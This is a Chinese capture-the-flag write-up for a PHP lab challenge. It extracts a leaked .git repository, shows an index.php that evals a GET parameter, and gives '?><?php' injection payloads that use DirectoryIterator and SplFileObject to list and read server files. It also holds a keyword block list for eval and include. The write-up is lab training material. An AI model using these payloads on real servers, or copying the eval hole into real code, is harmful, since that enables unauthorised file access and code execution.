2025上半年赛

1phpms

扫目录发现git泄露,用githacker提一下

githacker --url http://5b45730d-cfab-4b87-bfa1-29a046ca06c4.node5.buuoj.cn:81/.git/ --output-folder C:\Users\25050\Downloads

历史修改记录中找到index.php源码

<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
    echo ':(';
}else{
    eval("#$shell");
}
?>

image-20250622165843343

发现很多函数都被禁用,但是原生类还可以用

shell=?><?php $a=new DirectoryIterator(".");
foreach($a as $f){
echo $f."    " ;
};?>

//no_careee.php .htaccess 3.php .git index.php 2.php 1.php
shell=?><?php $a=new SplFileObject('no_careee.php');
foreach($a as $a)
{echo $a."<br>";
    };?>
//no_careee.php
<?php
function block_if_dangerous_code($input) {
// 定义正则:匹配函数名,忽略大小写,捕获具体匹配内容
if (preg_match('/\b(eval|include|include_once|require|require_once)\b/i', $input, $match)) {
$matched_func = $match[1]; // 捕获到的函数名
echo "
";
echo "Warning: {$matched_func} has been disabled for security reasons in /var/www/html/index.php(6) : eval()'d code on line 1
";
exit;
}
}

// 检查 GET 参数 shell
if (isset($_GET['shell'])) {
block_if_dangerous_code($_GET['shell']);
}

?>
//index.php
<?php
$shell = $_GET['shell'];
if(preg_match('/\x0a|\x0d/',$shell)){
echo ':(';
}else{
eval("#$shell");
}
?>

可以读到根目录下有个hintflag,但是直接访问提示没权限,没找到提权方法